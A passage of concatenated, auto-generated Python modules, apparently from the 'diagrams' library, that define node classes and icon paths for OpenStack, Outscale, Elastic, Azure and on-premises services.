NOT EDIT. from . import _OpenStack class _User(_OpenStack): _type = "user" _icon_dir = "resources/openstack/user" class Openstackclient(_User): _icon = "openstackclient.png" # Aliases OpenStackClient = Openstackclient File: diagrams/openstack/billing.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _OpenStack class _Billing(_OpenStack): _type = "billing" _icon_dir = "resources/openstack/billing" class Cloudkitty(_Billing): _icon = "cloudkitty.png" # Aliases CloudKitty = Cloudkitty File: diagrams/openstack/sharedservices.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Sharedservices(_OpenStack): _type = "sharedservices" _icon_dir = "resources/openstack/sharedservices" class Barbican(_Sharedservices): _icon = "barbican.png" class Glance(_Sharedservices): _icon = "glance.png" class Karbor(_Sharedservices): _icon = "karbor.png" class Keystone(_Sharedservices): _icon = "keystone.png" class Searchlight(_Sharedservices): _icon = "searchlight.png" # Aliases File: diagrams/openstack/deployment.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Deployment(_OpenStack): _type = "deployment" _icon_dir = "resources/openstack/deployment" class Ansible(_Deployment): _icon = "ansible.png" class Charms(_Deployment): _icon = "charms.png" class Chef(_Deployment): _icon = "chef.png" class Helm(_Deployment): _icon = "helm.png" class Kolla(_Deployment): _icon = "kolla.png" class Tripleo(_Deployment): _icon = "tripleo.png" # Aliases KollaAnsible = Kolla TripleO = Tripleo File: diagrams/openstack/workloadprovisioning.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Workloadprovisioning(_OpenStack): _type = "workloadprovisioning" _icon_dir = "resources/openstack/workloadprovisioning" class Magnum(_Workloadprovisioning): _icon = "magnum.png" class Sahara(_Workloadprovisioning): _icon = "sahara.png" class Trove(_Workloadprovisioning): _icon = "trove.png" # Aliases File: diagrams/openstack/monitoring.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Monitoring(_OpenStack): _type = "monitoring" _icon_dir = "resources/openstack/monitoring" class Monasca(_Monitoring): _icon = "monasca.png" class Telemetry(_Monitoring): _icon = "telemetry.png" # Aliases File: diagrams/openstack/lifecyclemanagement.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Lifecyclemanagement(_OpenStack): _type = "lifecyclemanagement" _icon_dir = "resources/openstack/lifecyclemanagement" # Aliases File: diagrams/openstack/baremetal.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Baremetal(_OpenStack): _type = "baremetal" _icon_dir = "resources/openstack/baremetal" class Cyborg(_Baremetal): _icon = "cyborg.png" class Ironic(_Baremetal): _icon = "ironic.png" # Aliases File: diagrams/openstack/optimization.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Optimization(_OpenStack): _type = "optimization" _icon_dir = "resources/openstack/optimization" class Congress(_Optimization): _icon = "congress.png" class Rally(_Optimization): _icon = "rally.png" class Vitrage(_Optimization): _icon = "vitrage.png" class Watcher(_Optimization): _icon = "watcher.png" # Aliases File: diagrams/openstack/frontend.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Frontend(_OpenStack): _type = "frontend" _icon_dir = "resources/openstack/frontend" class Horizon(_Frontend): _icon = "horizon.png" # Aliases File: diagrams/openstack/__init__.py """ Openstack provides a set of general OpenStack services. 
""" from diagrams import Node class _OpenStack(Node): _provider = "openstack" _icon_dir = "resources/openstack" fontcolor = "#ffffff" File: diagrams/openstack/orchestration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Orchestration(_OpenStack): _type = "orchestration" _icon_dir = "resources/openstack/orchestration" class Blazar(_Orchestration): _icon = "blazar.png" class Heat(_Orchestration): _icon = "heat.png" class Mistral(_Orchestration): _icon = "mistral.png" class Senlin(_Orchestration): _icon = "senlin.png" class Zaqar(_Orchestration): _icon = "zaqar.png" # Aliases File: diagrams/openstack/operations.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Operations(_OpenStack): _type = "operations" _icon_dir = "resources/openstack/operations" # Aliases File: diagrams/openstack/nfv.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _NFV(_OpenStack): _type = "nfv" _icon_dir = "resources/openstack/nfv" class Tacker(_NFV): _icon = "tacker.png" # Aliases File: diagrams/openstack/networking.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Networking(_OpenStack): _type = "networking" _icon_dir = "resources/openstack/networking" class Designate(_Networking): _icon = "designate.png" class Neutron(_Networking): _icon = "neutron.png" class Octavia(_Networking): _icon = "octavia.png" # Aliases File: diagrams/openstack/packaging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Packaging(_OpenStack): _type = "packaging" _icon_dir = "resources/openstack/packaging" class LOCI(_Packaging): _icon = "loci.png" class Puppet(_Packaging): _icon = "puppet.png" class RPM(_Packaging): _icon = "rpm.png" # Aliases File: diagrams/openstack/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Storage(_OpenStack): _type = "storage" _icon_dir = "resources/openstack/storage" class Cinder(_Storage): _icon = "cinder.png" class Manila(_Storage): _icon = "manila.png" class Swift(_Storage): _icon = "swift.png" # Aliases File: diagrams/openstack/adjacentenablers.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Adjacentenablers(_OpenStack): _type = "adjacentenablers" _icon_dir = "resources/openstack/adjacentenablers" # Aliases File: diagrams/openstack/apiproxies.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Apiproxies(_OpenStack): _type = "apiproxies" _icon_dir = "resources/openstack/apiproxies" class EC2API(_Apiproxies): _icon = "ec2api.png" # Aliases File: diagrams/openstack/applicationlifecycle.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Applicationlifecycle(_OpenStack): _type = "applicationlifecycle" _icon_dir = "resources/openstack/applicationlifecycle" class Freezer(_Applicationlifecycle): _icon = "freezer.png" class Masakari(_Applicationlifecycle): _icon = "masakari.png" class Murano(_Applicationlifecycle): _icon = "murano.png" class Solum(_Applicationlifecycle): _icon = "solum.png" # Aliases File: diagrams/openstack/multiregion.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _OpenStack class _Multiregion(_OpenStack): _type = "multiregion" _icon_dir = "resources/openstack/multiregion" class Tricircle(_Multiregion): _icon = "tricircle.png" # Aliases File: diagrams/openstack/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Compute(_OpenStack): _type = "compute" _icon_dir = "resources/openstack/compute" class Nova(_Compute): _icon = "nova.png" class Qinling(_Compute): _icon = "qinling.png" class Zun(_Compute): _icon = "zun.png" # Aliases File: diagrams/outscale/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Security(_Outscale): _type = "security" _icon_dir = "resources/outscale/security" class Firewall(_Security): _icon = "firewall.png" class IdentityAndAccessManagement(_Security): _icon = "identity-and-access-management.png" # Aliases File: diagrams/outscale/__init__.py from diagrams import Node class _Outscale(Node): _provider = "outscale" _icon_dir = "resources/outscale" fontcolor = "#ffffff" File: diagrams/outscale/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Storage(_Outscale): _type = "storage" _icon_dir = "resources/outscale/storage" class SimpleStorageService(_Storage): _icon = "simple-storage-service.png" class Storage(_Storage): _icon = "storage.png" # Aliases File: diagrams/outscale/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Network(_Outscale): _type = "network" _icon_dir = "resources/outscale/network" class ClientVpn(_Network): _icon = "client-vpn.png" class InternetService(_Network): _icon = "internet-service.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class NatService(_Network): _icon = "nat-service.png" class Net(_Network): _icon = "net.png" class SiteToSiteVpng(_Network): _icon = "site-to-site-vpng.png" # Aliases File: diagrams/outscale/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Compute(_Outscale): _type = "compute" _icon_dir = "resources/outscale/compute" class Compute(_Compute): _icon = "compute.png" class DirectConnect(_Compute): _icon = "direct-connect.png" # Aliases File: diagrams/elastic/elasticsearch.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Elasticsearch(_Elastic): _type = "elasticsearch" _icon_dir = "resources/elastic/elasticsearch" class Alerting(_Elasticsearch): _icon = "alerting.png" class Beats(_Elasticsearch): _icon = "beats.png" class Elasticsearch(_Elasticsearch): _icon = "elasticsearch.png" class Kibana(_Elasticsearch): _icon = "kibana.png" class LogstashPipeline(_Elasticsearch): _icon = "logstash-pipeline.png" class Logstash(_Elasticsearch): _icon = "logstash.png" class MachineLearning(_Elasticsearch): _icon = "machine-learning.png" class MapServices(_Elasticsearch): _icon = "map-services.png" class Maps(_Elasticsearch): _icon = "maps.png" class Monitoring(_Elasticsearch): _icon = "monitoring.png" class SearchableSnapshots(_Elasticsearch): _icon = "searchable-snapshots.png" class SecuritySettings(_Elasticsearch): _icon = "security-settings.png" class SQL(_Elasticsearch): _icon = "sql.png" class Stack(_Elasticsearch): _icon = "stack.png" # Aliases ElasticSearch = Elasticsearch LogStash = Logstash ML = MachineLearning File: diagrams/elastic/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. 
from . import _Elastic class _Security(_Elastic): _type = "security" _icon_dir = "resources/elastic/security" class Endpoint(_Security): _icon = "endpoint.png" class Security(_Security): _icon = "security.png" class SIEM(_Security): _icon = "siem.png" class Xdr(_Security): _icon = "xdr.png" # Aliases File: diagrams/elastic/saas.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Saas(_Elastic): _type = "saas" _icon_dir = "resources/elastic/saas" class Cloud(_Saas): _icon = "cloud.png" class Elastic(_Saas): _icon = "elastic.png" # Aliases File: diagrams/elastic/__init__.py """ Elastic provides a set of general elastic services. """ from diagrams import Node class _Elastic(Node): _provider = "elastic" _icon_dir = "resources/elastic" fontcolor = "#ffffff" File: diagrams/elastic/observability.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Observability(_Elastic): _type = "observability" _icon_dir = "resources/elastic/observability" class APM(_Observability): _icon = "apm.png" class Logs(_Observability): _icon = "logs.png" class Metrics(_Observability): _icon = "metrics.png" class Observability(_Observability): _icon = "observability.png" class Uptime(_Observability): _icon = "uptime.png" # Aliases File: diagrams/elastic/orchestration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Orchestration(_Elastic): _type = "orchestration" _icon_dir = "resources/elastic/orchestration" class ECE(_Orchestration): _icon = "ece.png" class ECK(_Orchestration): _icon = "eck.png" # Aliases File: diagrams/elastic/beats.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Beats(_Elastic): _type = "beats" _icon_dir = "resources/elastic/beats" class APM(_Beats): _icon = "apm.png" class Auditbeat(_Beats): _icon = "auditbeat.png" class Filebeat(_Beats): _icon = "filebeat.png" class Functionbeat(_Beats): _icon = "functionbeat.png" class Heartbeat(_Beats): _icon = "heartbeat.png" class Metricbeat(_Beats): _icon = "metricbeat.png" class Packetbeat(_Beats): _icon = "packetbeat.png" class Winlogbeat(_Beats): _icon = "winlogbeat.png" # Aliases File: diagrams/elastic/agent.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Agent(_Elastic): _type = "agent" _icon_dir = "resources/elastic/agent" class Agent(_Agent): _icon = "agent.png" class Endpoint(_Agent): _icon = "endpoint.png" class Fleet(_Agent): _icon = "fleet.png" class Integrations(_Agent): _icon = "integrations.png" # Aliases File: diagrams/elastic/enterprisesearch.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Enterprisesearch(_Elastic): _type = "enterprisesearch" _icon_dir = "resources/elastic/enterprisesearch" class AppSearch(_Enterprisesearch): _icon = "app-search.png" class Crawler(_Enterprisesearch): _icon = "crawler.png" class EnterpriseSearch(_Enterprisesearch): _icon = "enterprise-search.png" class SiteSearch(_Enterprisesearch): _icon = "site-search.png" class WorkplaceSearch(_Enterprisesearch): _icon = "workplace-search.png" # Aliases File: diagrams/azure/web.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Azure class _Web(_Azure): _type = "web" _icon_dir = "resources/azure/web" class APIConnections(_Web): _icon = "api-connections.png" class AppServiceCertificates(_Web): _icon = "app-service-certificates.png" class AppServiceDomains(_Web): _icon = "app-service-domains.png" class AppServiceEnvironments(_Web): _icon = "app-service-environments.png" class AppServicePlans(_Web): _icon = "app-service-plans.png" class AppServices(_Web): _icon = "app-services.png" class MediaServices(_Web): _icon = "media-services.png" class NotificationHubNamespaces(_Web): _icon = "notification-hub-namespaces.png" class Search(_Web): _icon = "search.png" class Signalr(_Web): _icon = "signalr.png" # Aliases File: diagrams/azure/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Database(_Azure): _type = "database" _icon_dir = "resources/azure/database" class BlobStorage(_Database): _icon = "blob-storage.png" class CacheForRedis(_Database): _icon = "cache-for-redis.png" class CosmosDb(_Database): _icon = "cosmos-db.png" class DataExplorerClusters(_Database): _icon = "data-explorer-clusters.png" class DataFactory(_Database): _icon = "data-factory.png" class DataLake(_Database): _icon = "data-lake.png" class DatabaseForMariadbServers(_Database): _icon = "database-for-mariadb-servers.png" class DatabaseForMysqlServers(_Database): _icon = "database-for-mysql-servers.png" class DatabaseForPostgresqlServers(_Database): _icon = "database-for-postgresql-servers.png" class ElasticDatabasePools(_Database): _icon = "elastic-database-pools.png" class ElasticJobAgents(_Database): _icon = "elastic-job-agents.png" class InstancePools(_Database): _icon = "instance-pools.png" class ManagedDatabases(_Database): _icon = "managed-databases.png" class SQLDatabases(_Database): _icon = "sql-databases.png" class SQLDatawarehouse(_Database): _icon = "sql-datawarehouse.png" class SQLManagedInstances(_Database): _icon = "sql-managed-instances.png" class SQLServerStretchDatabases(_Database): _icon = "sql-server-stretch-databases.png" class SQLServers(_Database): _icon = "sql-servers.png" class SQLVM(_Database): _icon = "sql-vm.png" class SQL(_Database): _icon = "sql.png" class SsisLiftAndShiftIr(_Database): _icon = "ssis-lift-and-shift-ir.png" class SynapseAnalytics(_Database): _icon = "synapse-analytics.png" class VirtualClusters(_Database): _icon = "virtual-clusters.png" class VirtualDatacenter(_Database): _icon = "virtual-datacenter.png" # Aliases File: diagrams/azure/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Security(_Azure): _type = "security" _icon_dir = "resources/azure/security" class ApplicationSecurityGroups(_Security): _icon = "application-security-groups.png" class ConditionalAccess(_Security): _icon = "conditional-access.png" class Defender(_Security): _icon = "defender.png" class ExtendedSecurityUpdates(_Security): _icon = "extended-security-updates.png" class KeyVaults(_Security): _icon = "key-vaults.png" class SecurityCenter(_Security): _icon = "security-center.png" class Sentinel(_Security): _icon = "sentinel.png" # Aliases File: diagrams/azure/mobile.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Azure class _Mobile(_Azure): _type = "mobile" _icon_dir = "resources/azure/mobile" class AppServiceMobile(_Mobile): _icon = "app-service-mobile.png" class MobileEngagement(_Mobile): _icon = "mobile-engagement.png" class NotificationHubs(_Mobile): _icon = "notification-hubs.png" # Aliases File: diagrams/azure/__init__.py """ Azure provides a set of services for Microsoft Azure provider. """ from diagrams import Node class _Azure(Node): _provider = "azure" _icon_dir = "resources/azure" fontcolor = "#ffffff" File: diagrams/azure/devops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Devops(_Azure): _type = "devops" _icon_dir = "resources/azure/devops" class ApplicationInsights(_Devops): _icon = "application-insights.png" class Artifacts(_Devops): _icon = "artifacts.png" class Boards(_Devops): _icon = "boards.png" class Devops(_Devops): _icon = "devops.png" class DevtestLabs(_Devops): _icon = "devtest-labs.png" class LabServices(_Devops): _icon = "lab-services.png" class Pipelines(_Devops): _icon = "pipelines.png" class Repos(_Devops): _icon = "repos.png" class TestPlans(_Devops): _icon = "test-plans.png" # Aliases File: diagrams/azure/integration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Integration(_Azure): _type = "integration" _icon_dir = "resources/azure/integration" class APIForFhir(_Integration): _icon = "api-for-fhir.png" class APIManagement(_Integration): _icon = "api-management.png" class AppConfiguration(_Integration): _icon = "app-configuration.png" class DataCatalog(_Integration): _icon = "data-catalog.png" class EventGridDomains(_Integration): _icon = "event-grid-domains.png" class EventGridSubscriptions(_Integration): _icon = "event-grid-subscriptions.png" class EventGridTopics(_Integration): _icon = "event-grid-topics.png" class IntegrationAccounts(_Integration): _icon = "integration-accounts.png" class IntegrationServiceEnvironments(_Integration): _icon = "integration-service-environments.png" class LogicAppsCustomConnector(_Integration): _icon = "logic-apps-custom-connector.png" class LogicApps(_Integration): _icon = "logic-apps.png" class PartnerTopic(_Integration): _icon = "partner-topic.png" class SendgridAccounts(_Integration): _icon = "sendgrid-accounts.png" class ServiceBusRelays(_Integration): _icon = "service-bus-relays.png" class ServiceBus(_Integration): _icon = "service-bus.png" class ServiceCatalogManagedApplicationDefinitions(_Integration): _icon = "service-catalog-managed-application-definitions.png" class SoftwareAsAService(_Integration): _icon = "software-as-a-service.png" class StorsimpleDeviceManagers(_Integration): _icon = "storsimple-device-managers.png" class SystemTopic(_Integration): _icon = "system-topic.png" # Aliases File: diagrams/azure/ml.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Azure class _Ml(_Azure): _type = "ml" _icon_dir = "resources/azure/ml" class BatchAI(_Ml): _icon = "batch-ai.png" class BotServices(_Ml): _icon = "bot-services.png" class CognitiveServices(_Ml): _icon = "cognitive-services.png" class GenomicsAccounts(_Ml): _icon = "genomics-accounts.png" class MachineLearningServiceWorkspaces(_Ml): _icon = "machine-learning-service-workspaces.png" class MachineLearningStudioWebServicePlans(_Ml): _icon = "machine-learning-studio-web-service-plans.png" class MachineLearningStudioWebServices(_Ml): _icon = "machine-learning-studio-web-services.png" class MachineLearningStudioWorkspaces(_Ml): _icon = "machine-learning-studio-workspaces.png" # Aliases File: diagrams/azure/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Storage(_Azure): _type = "storage" _icon_dir = "resources/azure/storage" class ArchiveStorage(_Storage): _icon = "archive-storage.png" class Azurefxtedgefiler(_Storage): _icon = "azurefxtedgefiler.png" class BlobStorage(_Storage): _icon = "blob-storage.png" class DataBoxEdgeDataBoxGateway(_Storage): _icon = "data-box-edge-data-box-gateway.png" class DataBox(_Storage): _icon = "data-box.png" class DataLakeStorage(_Storage): _icon = "data-lake-storage.png" class GeneralStorage(_Storage): _icon = "general-storage.png" class NetappFiles(_Storage): _icon = "netapp-files.png" class QueuesStorage(_Storage): _icon = "queues-storage.png" class StorageAccountsClassic(_Storage): _icon = "storage-accounts-classic.png" class StorageAccounts(_Storage): _icon = "storage-accounts.png" class StorageExplorer(_Storage): _icon = "storage-explorer.png" class StorageSyncServices(_Storage): _icon = "storage-sync-services.png" class StorsimpleDataManagers(_Storage): _icon = "storsimple-data-managers.png" class StorsimpleDeviceManagers(_Storage): _icon = "storsimple-device-managers.png" class TableStorage(_Storage): _icon = "table-storage.png" # Aliases File: diagrams/azure/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Azure class _Network(_Azure): _type = "network" _icon_dir = "resources/azure/network" class ApplicationGateway(_Network): _icon = "application-gateway.png" class ApplicationSecurityGroups(_Network): _icon = "application-security-groups.png" class CDNProfiles(_Network): _icon = "cdn-profiles.png" class Connections(_Network): _icon = "connections.png" class DDOSProtectionPlans(_Network): _icon = "ddos-protection-plans.png" class DNSPrivateZones(_Network): _icon = "dns-private-zones.png" class DNSZones(_Network): _icon = "dns-zones.png" class ExpressrouteCircuits(_Network): _icon = "expressroute-circuits.png" class Firewall(_Network): _icon = "firewall.png" class FrontDoors(_Network): _icon = "front-doors.png" class LoadBalancers(_Network): _icon = "load-balancers.png" class LocalNetworkGateways(_Network): _icon = "local-network-gateways.png" class NetworkInterfaces(_Network): _icon = "network-interfaces.png" class NetworkSecurityGroupsClassic(_Network): _icon = "network-security-groups-classic.png" class NetworkWatcher(_Network): _icon = "network-watcher.png" class OnPremisesDataGateways(_Network): _icon = "on-premises-data-gateways.png" class PrivateEndpoint(_Network): _icon = "private-endpoint.png" class PublicIpAddresses(_Network): _icon = "public-ip-addresses.png" class ReservedIpAddressesClassic(_Network): _icon = "reserved-ip-addresses-classic.png" class RouteFilters(_Network): _icon = "route-filters.png" class RouteTables(_Network): _icon = "route-tables.png" class ServiceEndpointPolicies(_Network): _icon = "service-endpoint-policies.png" class Subnets(_Network): _icon = "subnets.png" class TrafficManagerProfiles(_Network): _icon = "traffic-manager-profiles.png" class VirtualNetworkClassic(_Network): _icon = "virtual-network-classic.png" class VirtualNetworkGateways(_Network): _icon = "virtual-network-gateways.png" class VirtualNetworks(_Network): _icon = "virtual-networks.png" class VirtualWans(_Network): _icon = "virtual-wans.png" # Aliases File: diagrams/azure/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Analytics(_Azure): _type = "analytics" _icon_dir = "resources/azure/analytics" class AnalysisServices(_Analytics): _icon = "analysis-services.png" class DataExplorerClusters(_Analytics): _icon = "data-explorer-clusters.png" class DataFactories(_Analytics): _icon = "data-factories.png" class DataLakeAnalytics(_Analytics): _icon = "data-lake-analytics.png" class DataLakeStoreGen1(_Analytics): _icon = "data-lake-store-gen1.png" class Databricks(_Analytics): _icon = "databricks.png" class EventHubClusters(_Analytics): _icon = "event-hub-clusters.png" class EventHubs(_Analytics): _icon = "event-hubs.png" class Hdinsightclusters(_Analytics): _icon = "hdinsightclusters.png" class LogAnalyticsWorkspaces(_Analytics): _icon = "log-analytics-workspaces.png" class StreamAnalyticsJobs(_Analytics): _icon = "stream-analytics-jobs.png" class SynapseAnalytics(_Analytics): _icon = "synapse-analytics.png" # Aliases File: diagrams/azure/migration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
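# --- Illustrative sketch: wiring the Azure analytics and storage nodes above,
# assuming the top-level `diagrams.Diagram` API; labels are made up.
from diagrams import Diagram
from diagrams.azure.analytics import EventHubs, StreamAnalyticsJobs, SynapseAnalytics
from diagrams.azure.storage import BlobStorage

with Diagram("azure_streaming_sketch", show=False):
    # Event ingestion through stream processing into a warehouse and cold storage
    EventHubs("ingest") >> StreamAnalyticsJobs("stream job") >> [
        SynapseAnalytics("warehouse"),
        BlobStorage("archive"),
    ]
# --- end sketch ---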
import _Azure class _Migration(_Azure): _type = "migration" _icon_dir = "resources/azure/migration" class DataBoxEdge(_Migration): _icon = "data-box-edge.png" class DataBox(_Migration): _icon = "data-box.png" class DatabaseMigrationServices(_Migration): _icon = "database-migration-services.png" class MigrationProjects(_Migration): _icon = "migration-projects.png" class RecoveryServicesVaults(_Migration): _icon = "recovery-services-vaults.png" # Aliases File: diagrams/azure/identity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Identity(_Azure): _type = "identity" _icon_dir = "resources/azure/identity" class AccessReview(_Identity): _icon = "access-review.png" class ActiveDirectoryConnectHealth(_Identity): _icon = "active-directory-connect-health.png" class ActiveDirectory(_Identity): _icon = "active-directory.png" class ADB2C(_Identity): _icon = "ad-b2c.png" class ADDomainServices(_Identity): _icon = "ad-domain-services.png" class ADIdentityProtection(_Identity): _icon = "ad-identity-protection.png" class ADPrivilegedIdentityManagement(_Identity): _icon = "ad-privileged-identity-management.png" class AppRegistrations(_Identity): _icon = "app-registrations.png" class ConditionalAccess(_Identity): _icon = "conditional-access.png" class EnterpriseApplications(_Identity): _icon = "enterprise-applications.png" class Groups(_Identity): _icon = "groups.png" class IdentityGovernance(_Identity): _icon = "identity-governance.png" class InformationProtection(_Identity): _icon = "information-protection.png" class ManagedIdentities(_Identity): _icon = "managed-identities.png" class Users(_Identity): _icon = "users.png" # Aliases File: diagrams/azure/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Iot(_Azure): _type = "iot" _icon_dir = "resources/azure/iot" class DeviceProvisioningServices(_Iot): _icon = "device-provisioning-services.png" class DigitalTwins(_Iot): _icon = "digital-twins.png" class IotCentralApplications(_Iot): _icon = "iot-central-applications.png" class IotHubSecurity(_Iot): _icon = "iot-hub-security.png" class IotHub(_Iot): _icon = "iot-hub.png" class Maps(_Iot): _icon = "maps.png" class Sphere(_Iot): _icon = "sphere.png" class TimeSeriesInsightsEnvironments(_Iot): _icon = "time-series-insights-environments.png" class TimeSeriesInsightsEventsSources(_Iot): _icon = "time-series-insights-events-sources.png" class Windows10IotCoreServices(_Iot): _icon = "windows-10-iot-core-services.png" # Aliases File: diagrams/azure/general.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
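# --- Illustrative sketch: Azure IoT and identity nodes from the modules above,
# assuming the standard `diagrams.Diagram` context manager; labels are invented.
from diagrams import Diagram
from diagrams.azure.identity import ManagedIdentities
from diagrams.azure.iot import DeviceProvisioningServices, IotHub

with Diagram("azure_iot_sketch", show=False):
    hub = IotHub("iot hub")
    DeviceProvisioningServices("device provisioning") >> hub
    ManagedIdentities("workload identity") >> hub
# --- end sketch ---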
import _Azure class _General(_Azure): _type = "general" _icon_dir = "resources/azure/general" class Allresources(_General): _icon = "allresources.png" class Azurehome(_General): _icon = "azurehome.png" class Developertools(_General): _icon = "developertools.png" class Helpsupport(_General): _icon = "helpsupport.png" class Information(_General): _icon = "information.png" class Managementgroups(_General): _icon = "managementgroups.png" class Marketplace(_General): _icon = "marketplace.png" class Quickstartcenter(_General): _icon = "quickstartcenter.png" class Recent(_General): _icon = "recent.png" class Reservations(_General): _icon = "reservations.png" class Resource(_General): _icon = "resource.png" class Resourcegroups(_General): _icon = "resourcegroups.png" class Servicehealth(_General): _icon = "servicehealth.png" class Shareddashboard(_General): _icon = "shareddashboard.png" class Subscriptions(_General): _icon = "subscriptions.png" class Support(_General): _icon = "support.png" class Supportrequests(_General): _icon = "supportrequests.png" class Tag(_General): _icon = "tag.png" class Tags(_General): _icon = "tags.png" class Templates(_General): _icon = "templates.png" class Twousericon(_General): _icon = "twousericon.png" class Userhealthicon(_General): _icon = "userhealthicon.png" class Usericon(_General): _icon = "usericon.png" class Userprivacy(_General): _icon = "userprivacy.png" class Userresource(_General): _icon = "userresource.png" class Whatsnew(_General): _icon = "whatsnew.png" # Aliases File: diagrams/azure/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Compute(_Azure): _type = "compute" _icon_dir = "resources/azure/compute" class AppServices(_Compute): _icon = "app-services.png" class AutomanagedVM(_Compute): _icon = "automanaged-vm.png" class AvailabilitySets(_Compute): _icon = "availability-sets.png" class BatchAccounts(_Compute): _icon = "batch-accounts.png" class CitrixVirtualDesktopsEssentials(_Compute): _icon = "citrix-virtual-desktops-essentials.png" class CloudServicesClassic(_Compute): _icon = "cloud-services-classic.png" class CloudServices(_Compute): _icon = "cloud-services.png" class CloudsimpleVirtualMachines(_Compute): _icon = "cloudsimple-virtual-machines.png" class ContainerApps(_Compute): _icon = "container-apps.png" class ContainerInstances(_Compute): _icon = "container-instances.png" class ContainerRegistries(_Compute): _icon = "container-registries.png" class DiskEncryptionSets(_Compute): _icon = "disk-encryption-sets.png" class DiskSnapshots(_Compute): _icon = "disk-snapshots.png" class Disks(_Compute): _icon = "disks.png" class FunctionApps(_Compute): _icon = "function-apps.png" class ImageDefinitions(_Compute): _icon = "image-definitions.png" class ImageVersions(_Compute): _icon = "image-versions.png" class KubernetesServices(_Compute): _icon = "kubernetes-services.png" class MeshApplications(_Compute): _icon = "mesh-applications.png" class OsImages(_Compute): _icon = "os-images.png" class SAPHANAOnAzure(_Compute): _icon = "sap-hana-on-azure.png" class ServiceFabricClusters(_Compute): _icon = "service-fabric-clusters.png" class SharedImageGalleries(_Compute): _icon = "shared-image-galleries.png" class SpringCloud(_Compute): _icon = "spring-cloud.png" class VMClassic(_Compute): _icon = "vm-classic.png" class VMImages(_Compute): _icon = "vm-images.png" class VMLinux(_Compute): _icon = "vm-linux.png" class VMScaleSet(_Compute): _icon = "vm-scale-set.png" class VMWindows(_Compute): _icon = 
"vm-windows.png" class VM(_Compute): _icon = "vm.png" class Workspaces(_Compute): _icon = "workspaces.png" # Aliases ACR = ContainerRegistries AKS = KubernetesServices VMSS = VMScaleSet File: diagrams/onprem/queue.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Queue(_OnPrem): _type = "queue" _icon_dir = "resources/onprem/queue" class Activemq(_Queue): _icon = "activemq.png" class Celery(_Queue): _icon = "celery.png" class Emqx(_Queue): _icon = "emqx.png" class Kafka(_Queue): _icon = "kafka.png" class Nats(_Queue): _icon = "nats.png" class Rabbitmq(_Queue): _icon = "rabbitmq.png" class Zeromq(_Queue): _icon = "zeromq.png" # Aliases ActiveMQ = Activemq EMQX = Emqx RabbitMQ = Rabbitmq ZeroMQ = Zeromq File: diagrams/onprem/auth.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Auth(_OnPrem): _type = "auth" _icon_dir = "resources/onprem/auth" class Boundary(_Auth): _icon = "boundary.png" class BuzzfeedSso(_Auth): _icon = "buzzfeed-sso.png" class Oauth2Proxy(_Auth): _icon = "oauth2-proxy.png" # Aliases File: diagrams/onprem/etl.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Etl(_OnPrem): _type = "etl" _icon_dir = "resources/onprem/etl" class Embulk(_Etl): _icon = "embulk.png" # Aliases File: diagrams/onprem/logging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. 